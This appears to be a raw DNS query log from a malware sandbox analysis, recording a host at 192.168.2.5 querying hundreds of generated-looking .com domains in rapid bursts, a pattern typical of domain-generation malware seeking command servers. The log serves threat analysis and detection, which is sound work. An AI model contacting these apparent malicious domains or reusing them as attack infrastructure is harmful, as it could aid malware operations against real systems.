Aug 23, 2024 18:43:04.367557049 CEST	192.168.2.5	1.1.1.1	0x269b	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:04.439201117 CEST	192.168.2.5	1.1.1.1	0x7b39	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.796789885 CEST	192.168.2.5	1.1.1.1	0xdac7	Standard query (0)	qedysov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.798980951 CEST	192.168.2.5	1.1.1.1	0xc89a	Standard query (0)	pumylel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.800812006 CEST	192.168.2.5	1.1.1.1	0x642c	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.802519083 CEST	192.168.2.5	1.1.1.1	0x5e59	Standard query (0)	lysysod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.804316998 CEST	192.168.2.5	1.1.1.1	0x1c02	Standard query (0)	vonyket.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.806286097 CEST	192.168.2.5	1.1.1.1	0x793e	Standard query (0)	qekynuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.808192015 CEST	192.168.2.5	1.1.1.1	0x2feb	Standard query (0)	pupypiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.809916019 CEST	192.168.2.5	1.1.1.1	0x5aa1	Standard query (0)	ganykaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.812623978 CEST	192.168.2.5	1.1.1.1	0x8edd	Standard query (0)	lykynyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.814306974 CEST	192.168.2.5	1.1.1.1	0xc12b	Standard query (0)	vopypif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.816147089 CEST	192.168.2.5	1.1.1.1	0x356d	Standard query (0)	qebykap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.818232059 CEST	192.168.2.5	1.1.1.1	0x2ea0	Standard query (0)	pujybyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.820238113 CEST	192.168.2.5	1.1.1.1	0xbf73	Standard query (0)	gatypub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.821754932 CEST	192.168.2.5	1.1.1.1	0x9ddf	Standard query (0)	lyvyjox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.823281050 CEST	192.168.2.5	1.1.1.1	0x76b3	Standard query (0)	vojybek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.924679995 CEST	192.168.2.5	1.1.1.1	0x71df	Standard query (0)	qetytug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.925075054 CEST	192.168.2.5	1.1.1.1	0x398f	Standard query (0)	puvyjop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.925581932 CEST	192.168.2.5	1.1.1.1	0xdf76	Standard query (0)	gahyvew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.929527998 CEST	192.168.2.5	1.1.1.1	0xd174	Standard query (0)	lyrytun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.930022001 CEST	192.168.2.5	1.1.1.1	0x8cad	Standard query (0)	vocyjic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.930253983 CEST	192.168.2.5	1.1.1.1	0xaea7	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.930438995 CEST	192.168.2.5	1.1.1.1	0x55	Standard query (0)	purytyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.932519913 CEST	192.168.2.5	1.1.1.1	0xcc1d	Standard query (0)	gacyhis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.932734013 CEST	192.168.2.5	1.1.1.1	0xc2f2	Standard query (0)	lygyvar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.933109045 CEST	192.168.2.5	1.1.1.1	0x5e52	Standard query (0)	vowyrym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.933352947 CEST	192.168.2.5	1.1.1.1	0x9a76	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.933604956 CEST	192.168.2.5	1.1.1.1	0xa7b4	Standard query (0)	lyxygud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.933624983 CEST	192.168.2.5	1.1.1.1	0x87d7	Standard query (0)	pufycol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.933837891 CEST	192.168.2.5	1.1.1.1	0xb6f7	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.934011936 CEST	192.168.2.5	1.1.1.1	0x11ea	Standard query (0)	puzyguv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.934083939 CEST	192.168.2.5	1.1.1.1	0xc556	Standard query (0)	qeqyreq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.934273005 CEST	192.168.2.5	1.1.1.1	0x8cda	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.934447050 CEST	192.168.2.5	1.1.1.1	0x4856	Standard query (0)	lymywaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.934631109 CEST	192.168.2.5	1.1.1.1	0xf0a8	Standard query (0)	qedyxip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.934712887 CEST	192.168.2.5	1.1.1.1	0xc303	Standard query (0)	volygyf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.934899092 CEST	192.168.2.5	1.1.1.1	0xd649	Standard query (0)	pumywaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.935096025 CEST	192.168.2.5	1.1.1.1	0x3ee2	Standard query (0)	galyfyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.935375929 CEST	192.168.2.5	1.1.1.1	0x8822	Standard query (0)	vonyqok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.935411930 CEST	192.168.2.5	1.1.1.1	0xe3b5	Standard query (0)	lysyxux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.935596943 CEST	192.168.2.5	1.1.1.1	0x99	Standard query (0)	qekyfeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.935790062 CEST	192.168.2.5	1.1.1.1	0xc983	Standard query (0)	pupyxup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.936141014 CEST	192.168.2.5	1.1.1.1	0x5151	Standard query (0)	ganyqow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.936461926 CEST	192.168.2.5	1.1.1.1	0x4fa8	Standard query (0)	lykyfen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.936645031 CEST	192.168.2.5	1.1.1.1	0x6025	Standard query (0)	vopyzuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.936939955 CEST	192.168.2.5	1.1.1.1	0xdbaf	Standard query (0)	qebyqil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.937238932 CEST	192.168.2.5	1.1.1.1	0x9035	Standard query (0)	pujydag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.937593937 CEST	192.168.2.5	1.1.1.1	0x360e	Standard query (0)	gatyzys.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.937731981 CEST	192.168.2.5	1.1.1.1	0xea8f	Standard query (0)	lyvymir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.937900066 CEST	192.168.2.5	1.1.1.1	0xa366	Standard query (0)	vojydam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.938103914 CEST	192.168.2.5	1.1.1.1	0x8b4c	Standard query (0)	qetylyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.938265085 CEST	192.168.2.5	1.1.1.1	0x585c	Standard query (0)	puvymul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.938334942 CEST	192.168.2.5	1.1.1.1	0x62d1	Standard query (0)	gahydoh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.938487053 CEST	192.168.2.5	1.1.1.1	0x5b12	Standard query (0)	lyryled.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.938658953 CEST	192.168.2.5	1.1.1.1	0xbdae	Standard query (0)	vocymut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.938915014 CEST	192.168.2.5	1.1.1.1	0x9187	Standard query (0)	qegysoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.939352989 CEST	192.168.2.5	1.1.1.1	0x1406	Standard query (0)	gacynuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.939479113 CEST	192.168.2.5	1.1.1.1	0xdc4a	Standard query (0)	purylev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.939904928 CEST	192.168.2.5	1.1.1.1	0xb6d7	Standard query (0)	lygysij.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.940624952 CEST	192.168.2.5	1.1.1.1	0xf67b	Standard query (0)	pufypiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.940664053 CEST	192.168.2.5	1.1.1.1	0x6d21	Standard query (0)	vowykaf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.940886021 CEST	192.168.2.5	1.1.1.1	0x8d7c	Standard query (0)	qexynyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.941073895 CEST	192.168.2.5	1.1.1.1	0xf2fd	Standard query (0)	gaqykab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.941448927 CEST	192.168.2.5	1.1.1.1	0xfda4	Standard query (0)	gaqyreh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:05.941502094 CEST	192.168.2.5	1.1.1.1	0xf293	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.138880014 CEST	192.168.2.5	1.1.1.1	0xa9e8	Standard query (0)	galynuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.215157032 CEST	192.168.2.5	1.1.1.1	0xcb9a	Standard query (0)	gadyciz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.307332039 CEST	192.168.2.5	1.1.1.1	0x8150	Standard query (0)	lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.376097918 CEST	192.168.2.5	1.1.1.1	0xed46	Standard query (0)	qexyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.379307032 CEST	192.168.2.5	1.1.1.1	0xa040	Standard query (0)	vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:06.390331030 CEST	192.168.2.5	1.1.1.1	0xf7c1	Standard query (0)	qegyval.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:07.280024052 CEST	192.168.2.5	1.1.1.1	0x75d6	Standard query (0)	ww25.lyxynyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:07.473026037 CEST	192.168.2.5	1.1.1.1	0xd8d0	Standard query (0)	ww16.vofycot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.754394054 CEST	192.168.2.5	1.1.1.1	0x7980	Standard query (0)	vofypuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.755290985 CEST	192.168.2.5	1.1.1.1	0xb6bb	Standard query (0)	qeqykog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.756052971 CEST	192.168.2.5	1.1.1.1	0x6c00	Standard query (0)	puzybep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.756603003 CEST	192.168.2.5	1.1.1.1	0x3e1a	Standard query (0)	gadypuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.756628036 CEST	192.168.2.5	1.1.1.1	0x4ff0	Standard query (0)	lymyjon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.757203102 CEST	192.168.2.5	1.1.1.1	0x89fd	Standard query (0)	volybec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.757242918 CEST	192.168.2.5	1.1.1.1	0xcaaf	Standard query (0)	qedytul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.757683039 CEST	192.168.2.5	1.1.1.1	0x7d42	Standard query (0)	pumyjig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.757719994 CEST	192.168.2.5	1.1.1.1	0x9501	Standard query (0)	galyvas.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.758208990 CEST	192.168.2.5	1.1.1.1	0xe5a0	Standard query (0)	lysytyr.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.758503914 CEST	192.168.2.5	1.1.1.1	0xc9ab	Standard query (0)	qekyvav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.758577108 CEST	192.168.2.5	1.1.1.1	0xe91f	Standard query (0)	vonyjim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.759017944 CEST	192.168.2.5	1.1.1.1	0x1804	Standard query (0)	pupytyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.759469986 CEST	192.168.2.5	1.1.1.1	0xa70d	Standard query (0)	lykyvod.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.759530067 CEST	192.168.2.5	1.1.1.1	0xbff2	Standard query (0)	ganyhuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.759900093 CEST	192.168.2.5	1.1.1.1	0xb61a	Standard query (0)	vopyret.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.760351896 CEST	192.168.2.5	1.1.1.1	0x9d10	Standard query (0)	gatyrez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.760406971 CEST	192.168.2.5	1.1.1.1	0x5222	Standard query (0)	pujycov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.760837078 CEST	192.168.2.5	1.1.1.1	0x7f72	Standard query (0)	lyvyguj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.760870934 CEST	192.168.2.5	1.1.1.1	0x9caf	Standard query (0)	vojycif.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.761420012 CEST	192.168.2.5	1.1.1.1	0x5e7d	Standard query (0)	qetyrap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.761550903 CEST	192.168.2.5	1.1.1.1	0x54ce	Standard query (0)	puvygyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.762053967 CEST	192.168.2.5	1.1.1.1	0x636e	Standard query (0)	lyrywax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.762379885 CEST	192.168.2.5	1.1.1.1	0xd035	Standard query (0)	vocygyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.762453079 CEST	192.168.2.5	1.1.1.1	0xb843	Standard query (0)	gahycib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.762847900 CEST	192.168.2.5	1.1.1.1	0x1d07	Standard query (0)	qegyxug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.762904882 CEST	192.168.2.5	1.1.1.1	0x8f2f	Standard query (0)	purywop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.763428926 CEST	192.168.2.5	1.1.1.1	0x42aa	Standard query (0)	gacyfew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.763752937 CEST	192.168.2.5	1.1.1.1	0x4d2d	Standard query (0)	vowyqoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.763853073 CEST	192.168.2.5	1.1.1.1	0xa87d	Standard query (0)	lygyxun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.764173985 CEST	192.168.2.5	1.1.1.1	0xe7a6	Standard query (0)	qexyfel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.764632940 CEST	192.168.2.5	1.1.1.1	0x15f7	Standard query (0)	pufyxug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.764992952 CEST	192.168.2.5	1.1.1.1	0x525a	Standard query (0)	gaqyqis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.765005112 CEST	192.168.2.5	1.1.1.1	0x4ef5	Standard query (0)	lyxyfar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.765178919 CEST	192.168.2.5	1.1.1.1	0x6db9	Standard query (0)	vofyzym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.766597986 CEST	192.168.2.5	1.1.1.1	0xb358	Standard query (0)	qeqyqiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.767991066 CEST	192.168.2.5	1.1.1.1	0xd236	Standard query (0)	qebyhuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768023014 CEST	192.168.2.5	1.1.1.1	0xdfc9	Standard query (0)	gadyzyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768220901 CEST	192.168.2.5	1.1.1.1	0x1419	Standard query (0)	puzydal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768248081 CEST	192.168.2.5	1.1.1.1	0xccb3	Standard query (0)	lymymud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768532991 CEST	192.168.2.5	1.1.1.1	0x216a	Standard query (0)	volydot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768784046 CEST	192.168.2.5	1.1.1.1	0xb3b9	Standard query (0)	qedyleq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768902063 CEST	192.168.2.5	1.1.1.1	0x8c79	Standard query (0)	pumymuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.768984079 CEST	192.168.2.5	1.1.1.1	0x308f	Standard query (0)	galydoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769145012 CEST	192.168.2.5	1.1.1.1	0x883b	Standard query (0)	qekysip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769211054 CEST	192.168.2.5	1.1.1.1	0xbc3e	Standard query (0)	vonymuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769361019 CEST	192.168.2.5	1.1.1.1	0xf8b3	Standard query (0)	pupylaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769539118 CEST	192.168.2.5	1.1.1.1	0x9615	Standard query (0)	ganynyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769539118 CEST	192.168.2.5	1.1.1.1	0x8a5d	Standard query (0)	lykysix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769619942 CEST	192.168.2.5	1.1.1.1	0x2934	Standard query (0)	vopykak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769725084 CEST	192.168.2.5	1.1.1.1	0x65d2	Standard query (0)	qebynyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769814968 CEST	192.168.2.5	1.1.1.1	0x3f0a	Standard query (0)	pujypup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.769942999 CEST	192.168.2.5	1.1.1.1	0xbfc7	Standard query (0)	gatykow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.770055056 CEST	192.168.2.5	1.1.1.1	0x2aca	Standard query (0)	vojypuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.770253897 CEST	192.168.2.5	1.1.1.1	0x7c45	Standard query (0)	lyvynen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.770551920 CEST	192.168.2.5	1.1.1.1	0xe51e	Standard query (0)	qetykol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.770638943 CEST	192.168.2.5	1.1.1.1	0xc3b0	Standard query (0)	gahypus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.770778894 CEST	192.168.2.5	1.1.1.1	0xd89b	Standard query (0)	puvybeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.770828009 CEST	192.168.2.5	1.1.1.1	0x7d78	Standard query (0)	lyryjir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771018028 CEST	192.168.2.5	1.1.1.1	0xe80	Standard query (0)	vocybam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771034956 CEST	192.168.2.5	1.1.1.1	0x7e6b	Standard query (0)	qegytyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771284103 CEST	192.168.2.5	1.1.1.1	0x8067	Standard query (0)	gacyvah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771284103 CEST	192.168.2.5	1.1.1.1	0x5a88	Standard query (0)	puryjil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.771483898 CEST	192.168.2.5	1.1.1.1	0xd244	Standard query (0)	lysylej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.937071085 CEST	192.168.2.5	1.1.1.1	0x7e93	Standard query (0)	lygytyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.938343048 CEST	192.168.2.5	1.1.1.1	0xe1f8	Standard query (0)	vowyjut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.939555883 CEST	192.168.2.5	1.1.1.1	0xc891	Standard query (0)	qexyvoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.941822052 CEST	192.168.2.5	1.1.1.1	0x6f71	Standard query (0)	pufytev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.942936897 CEST	192.168.2.5	1.1.1.1	0x4bad	Standard query (0)	gaqyhuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.943789959 CEST	192.168.2.5	1.1.1.1	0x3857	Standard query (0)	vofyref.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.943937063 CEST	192.168.2.5	1.1.1.1	0xe886	Standard query (0)	lyxyvoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.944366932 CEST	192.168.2.5	1.1.1.1	0x2b03	Standard query (0)	puzyciq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.945055962 CEST	192.168.2.5	1.1.1.1	0x9272	Standard query (0)	gadyrab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.945105076 CEST	192.168.2.5	1.1.1.1	0xdb23	Standard query (0)	lymygyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.945797920 CEST	192.168.2.5	1.1.1.1	0x70c3	Standard query (0)	volycik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.945872068 CEST	192.168.2.5	1.1.1.1	0xdb9f	Standard query (0)	qedyrag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.946568012 CEST	192.168.2.5	1.1.1.1	0x7cd1	Standard query (0)	pumygyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.946871996 CEST	192.168.2.5	1.1.1.1	0xa351	Standard query (0)	galycuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.947484970 CEST	192.168.2.5	1.1.1.1	0x7c33	Standard query (0)	lysywon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.947844982 CEST	192.168.2.5	1.1.1.1	0xfd6f	Standard query (0)	vonygec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.948422909 CEST	192.168.2.5	1.1.1.1	0x5e9e	Standard query (0)	pupywog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.948548079 CEST	192.168.2.5	1.1.1.1	0xa5bd	Standard query (0)	qekyxul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.949323893 CEST	192.168.2.5	1.1.1.1	0xf8eb	Standard query (0)	ganyfes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.949336052 CEST	192.168.2.5	1.1.1.1	0x985a	Standard query (0)	lykyxur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.949979067 CEST	192.168.2.5	1.1.1.1	0xe844	Standard query (0)	vopyqim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.950545073 CEST	192.168.2.5	1.1.1.1	0x2d8f	Standard query (0)	pujyxyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.950701952 CEST	192.168.2.5	1.1.1.1	0x12ef	Standard query (0)	qebyfav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.951400042 CEST	192.168.2.5	1.1.1.1	0xe3cf	Standard query (0)	vojyzyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.957992077 CEST	192.168.2.5	1.1.1.1	0xe6b8	Standard query (0)	qeqyhup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.958545923 CEST	192.168.2.5	1.1.1.1	0x70a5	Standard query (0)	gatyqih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.958970070 CEST	192.168.2.5	1.1.1.1	0x6212	Standard query (0)	lyvyfad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.959295988 CEST	192.168.2.5	1.1.1.1	0x4cc3	Standard query (0)	qetyquq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.959605932 CEST	192.168.2.5	1.1.1.1	0xebfb	Standard query (0)	puvydov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.960095882 CEST	192.168.2.5	1.1.1.1	0x83f3	Standard query (0)	lyrymuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.960422993 CEST	192.168.2.5	1.1.1.1	0xc35b	Standard query (0)	vocydof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.960705996 CEST	192.168.2.5	1.1.1.1	0x7620	Standard query (0)	gahyzez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.962457895 CEST	192.168.2.5	1.1.1.1	0x416b	Standard query (0)	qegylep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.963648081 CEST	192.168.2.5	1.1.1.1	0x2ca7	Standard query (0)	purymuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.964015007 CEST	192.168.2.5	1.1.1.1	0xbd07	Standard query (0)	gacydib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.964327097 CEST	192.168.2.5	1.1.1.1	0x5f06	Standard query (0)	lygylax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.964849949 CEST	192.168.2.5	1.1.1.1	0x33a	Standard query (0)	vowymyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.965249062 CEST	192.168.2.5	1.1.1.1	0xd20	Standard query (0)	pufylap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.965528965 CEST	192.168.2.5	1.1.1.1	0x822d	Standard query (0)	qexysig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.966301918 CEST	192.168.2.5	1.1.1.1	0x476a	Standard query (0)	gaqynyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.966721058 CEST	192.168.2.5	1.1.1.1	0xbc	Standard query (0)	lyxysun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.967428923 CEST	192.168.2.5	1.1.1.1	0xd972	Standard query (0)	vofykoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.967809916 CEST	192.168.2.5	1.1.1.1	0xee26	Standard query (0)	qeqynel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.968827009 CEST	192.168.2.5	1.1.1.1	0x386a	Standard query (0)	puzypug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.969647884 CEST	192.168.2.5	1.1.1.1	0xb3f4	Standard query (0)	gadykos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.970314026 CEST	192.168.2.5	1.1.1.1	0x8956	Standard query (0)	lymyner.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.970874071 CEST	192.168.2.5	1.1.1.1	0xf8ac	Standard query (0)	volypum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.971225977 CEST	192.168.2.5	1.1.1.1	0xcb15	Standard query (0)	qedykiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.972527981 CEST	192.168.2.5	1.1.1.1	0xc6bf	Standard query (0)	galypyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:43:27.972745895 CEST	192.168.2.5	1.1.1.1	0xfe33	Standard query (0)	pumybal.com	A (IP address)	IN (0x0001)	false
